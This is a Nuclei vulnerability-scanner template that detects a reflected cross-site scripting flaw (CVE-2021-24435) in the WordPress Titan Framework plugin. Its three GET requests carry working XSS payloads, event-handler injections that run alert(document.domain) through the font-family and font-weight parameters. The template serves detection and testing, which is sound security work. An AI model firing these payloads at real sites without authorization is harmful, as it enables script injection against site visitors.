nuclei-templates/http/cves/2021/CVE-2021-24435.yaml

59 lines
2.6 KiB
YAML

id: CVE-2021-24435
info:
name: WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting
author: xcapri,ritikchaddha
severity: medium
description: |
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: Fixed in version 2.7.12
reference:
- https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435
- https://nvd.nist.gov/vuln/detail/CVE-2021-24435
- https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24435
cwe-id: CWE-79
epss-score: 0.00172
epss-percentile: 0.54295
cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: gambit
product: titan_framework
framework: wordpress
tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit
http:
- method: GET
path:
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27"
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27"
- "{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: regex
regex:
- (?i)(onerror=|onclick=)['"]?alert\(document\.domain\)['"]?
- '<p>Grumpy wizards make'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100b274a3153b4cde29ead1240a44502cbd6ca417a12104f68f3e81fc354ff0091b022100fa5610d0c8faa4d8504b66848c83c4d689be8c8c917cac6db669e55696f38ecc:922c64590222798bb761d5b6d8e72950